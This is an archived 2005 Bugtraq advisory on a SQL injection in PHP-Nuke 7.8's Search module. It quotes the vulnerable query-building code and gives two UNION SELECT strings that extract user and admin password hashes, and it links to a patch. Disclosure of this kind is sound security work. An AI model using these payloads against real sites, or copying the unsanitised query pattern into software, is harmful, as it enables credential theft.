[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Critical SQL Injection PHPNuke <= 7.8
From: sp3x () securityreason ! com
Date: 2005-11-15 14:23:17
Message-ID: 20051115142317.7593.qmail () securityfocus ! com
[Download RAW message or body]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SecurityAlert SA027
Author: sp3x
GPG: http://securityreason.com/key/sp3x.gpg
Date: 15. November 2005
Affected software :
===================
PHPNuke version : 7.8 with all security fixes/patches
Not Affected software :
=======================
PHPNuke version : 7.9 + patch 3.1
Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online community \
or whatever you want to call it. The goal of PHP-Nuke is to have an automated web \
site to distribute news and articles with users system. Each user can submit comments \
to discuss the articles, just similar to Slashdot and many others. Main features \
include: web based admin, surveys, top page, access stats page with counter, user \
customizable box, themes manager for registered users, friendly administration GUI \
with graphic topic manager, option to edit or delete stories, option to delete \
comments, moderation system, Referers page to know who link us, sections manager, \
customizable HTML blocks, user and authors edit, an integrated Banners Ads system, \
search engine, backend/headlines generation (RSS/RDF format), and many, many more \
friendly functions. PHP-Nuke is written 100% in PHP and requires Apache Web server, \
PHP and a SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase). \
Support for 25 languages, Yahoo like search engine, Comments option in Polls, lot of \
themes, Ephemerids manager, File Manager, Headlines, download manager, faq manager, \
advanced blocks systems, reviews system, newsletter, categorized articles, \
multilanguage content management, phpBB Forums included and a lot more.
Vulnerabilities :
*****************
Critical SQL injection :
==========================
IN module called "Search" there exists SQL Injection bug, which can lead to stealing \
admin`s username and password md5 and also some sensitive data from database.
The problem exist in index.php so first let's see the source code of this file.
Original code from index.php :
- ---------------------------------
...
$query = stripslashes(check_html($query, "nohtml"));
if ($type=="stories" OR !$type) {
if ($category > 0) {
$categ = "AND catid='$category' ";
} else {
$categ = "";
}
$q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, \
a.url, s.comments, s.topic from ".$prefix."_stories s, ".$prefix."_authors a where \
s.aid=a.aid $queryalang $categ"; if (isset($query)) $q .= "AND (s.title LIKE \
'%$query%' OR s.hometext LIKE '%$query%' OR s.bodytext LIKE '%$query%' OR s.notes \
LIKE '%$query%') "; if (!empty($author)) $q .= "AND s.aid='$author' ";
if (!empty($topic)) $q .= "AND s.topic='$topic' ";
if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= \
'$days' "; $q .= " ORDER BY s.time DESC LIMIT $min,$offset";
$t = $topic;
$result5 = $db->sql_query($q);
$nrows = $db->sql_numrows($result5);
....
- -----------------------------------
Here we can see that there is stripslashes() used on $query variable .
Using stripslashes(); before mysql statment lead to critical Sql Injection attack.
This Sql Injection will work in every type of Search .
Here i mean :
type=="stories"
type=="comments"
type=="reviews"
type=="users"
And also will work when is_active("Downloads") , is_active("Web_Links") or \
is_active("Encyclopedia").
So we have here about 7 Critical SQL injections.
Exploit test :
- --------------
Enter this into Search field :
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* -> \
users passwords and logins
s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* -> nuke_authors \
passwords and logins
Exploit :
- ---------
http://securityreason.com/achievement_exploitalert/5
How to fix :
============
Download the new version of the script or update.
http://securityreason.com/patch/6
Greets :
========
Special greets : cXIb8O3 , pkw, pi3, p_e_a and others .
Contact :
=========
sp3x[at]securityreason[dot].com
www.securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)
iD8DBQFDedrRhaZ93YsJSwQRArwUAKCaSKtt8nqY66P3xazISfls+1VfoACglrMU
yDQ955aOQpjnDMqXPvClE/I=
=+sx9
-----END PGP SIGNATURE-----
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic